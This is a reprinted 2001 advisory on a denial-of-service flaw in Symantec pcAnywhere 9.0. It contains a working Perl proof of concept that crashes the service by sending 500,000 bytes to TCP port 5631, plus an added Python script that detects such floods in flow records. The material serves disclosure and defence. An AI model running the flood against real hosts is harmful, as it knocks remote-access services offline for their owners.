Reported February 11, 2001 by Securax.
VERSIONS AFFECTED
DESCRIPTION
A Denial of Service (DoS) vulnerability has been discovered
in Symantec PC Anywhere 9.0. By sending between 320KB and 500KB
of data to one of the two listening ports (5631 and 65301), a malicious user
can cause PCAnywhere to crash. Currently, the vulnerability is a simple
DoS risk, but the attack might be developed into an exploitable overflow.
DEMONSTRATION
The following proof of concept code was supplied by Securax.
<--bof-->
#!/usr/bin/perl
# Symantec PcAnywhere 9.0 Denial of Service
# -----------------------------------------
# by incubus <incubus@securax.net>
# http://www.hexyn.be
#
# http://www.securax.net
# All my love to Tessa.
# Greetz to: f0bic, r00tdude, t0micron, senti, vorlon, cicero,
# Zym0tic, segfault, #securax@irc.hexyn.be
# Thanks to jurgen swennen, for letting me (ab)use his computer.
#
# this is intended as proof of concept, do not abuse!
use IO::Socket;
$host = "$ARGV[0]";
$port = 5631;
if ($#ARGV<0) {
print "use it like: $0 <hostname>\n";
exit();
}
$socket = IO::Socket::INET->new(Proto=>"tcp",
PeerAddr=>$host,
PeerPort=>$port) || die "damn, ";
print "hello\n";
$buf = "";
for($counter = 0; $counter < 500000; $counter++) {
$buf .= "\x61";
}
print $socket "$buf\n";
close($socket);
exit();
<--eof-->
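A defender's counterpart to the traffic described above, as an added example that is not part of the Securax advisory: it scans flow records for TCP sessions to ports 5631 or 65301 whose client-to-server byte total reaches the reported 320KB lower bound. The flow-record column layout, the sample records, and reading 320KB as 320,000 bytes are assumptions made for illustration.

```python
import csv
import io
from collections import defaultdict

# Values taken from the advisory text.
PCANYWHERE_PORTS = {5631, 65301}
MIN_BYTES = 320_000  # lower bound of the reported range (decimal KB assumed)

# Constructed sample flow export; the column layout is hypothetical.
SAMPLE_FLOWS = """\
ts,src,sport,dst,dport,proto,bytes_to_server
2001-02-11T10:00:01,192.0.2.10,40112,198.51.100.5,5631,tcp,262144
2001-02-11T10:00:03,192.0.2.10,40112,198.51.100.5,5631,tcp,237857
2001-02-11T10:01:00,192.0.2.22,40500,198.51.100.5,5631,tcp,4096
2001-02-11T10:02:00,192.0.2.30,41000,198.51.100.5,80,tcp,900000
2001-02-11T10:03:00,192.0.2.40,42000,198.51.100.6,65301,tcp,not-a-number
2001-02-11T10:04:00,192.0.2.50,43000,198.51.100.6,65301,tcp,320000
"""

def find_oversized_sessions(flow_csv, ports=PCANYWHERE_PORTS, min_bytes=MIN_BYTES):
    """Return [(src, dst, dport, total_bytes)] for TCP sessions to the
    given ports whose client-to-server byte total reaches min_bytes."""
    totals = defaultdict(int)
    for row in csv.DictReader(io.StringIO(flow_csv)):
        try:
            dport = int(row["dport"])
            sent = int(row["bytes_to_server"])
        except (KeyError, TypeError, ValueError):
            continue  # skip malformed records instead of aborting the scan
        if row.get("proto", "").lower() != "tcp" or dport not in ports:
            continue
        # Exporters can split one long connection into several records,
        # so sum per connection before comparing against the threshold.
        key = (row["src"], row["sport"], row["dst"], dport)
        totals[key] += sent
    hits = [(src, dst, dport, total)
            for (src, _sport, dst, dport), total in totals.items()
            if total >= min_bytes]
    return sorted(hits, key=lambda h: h[3], reverse=True)

if __name__ == "__main__":
    for src, dst, dport, total in find_oversized_sessions(SAMPLE_FLOWS):
        print(f"{src} -> {dst}:{dport} sent {total} bytes")
```

Legitimate pcAnywhere file transfers can also exceed this volume, so hits are candidates for review rather than confirmed attacks.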
VENDOR RESPONSE
Unfortunately, Securax released its advisory to the public in conjunction
with contacting the vendor, so no vendor response is available at this time.
A copy of the Securax advisory is available at:
http://listserv.ntsecurity.net/scripts/wa-ntsecurity.exe?A2=ind0102b&L=win2ksecadvice&F=&S=&P=1025
CREDIT
Discovered by Securax.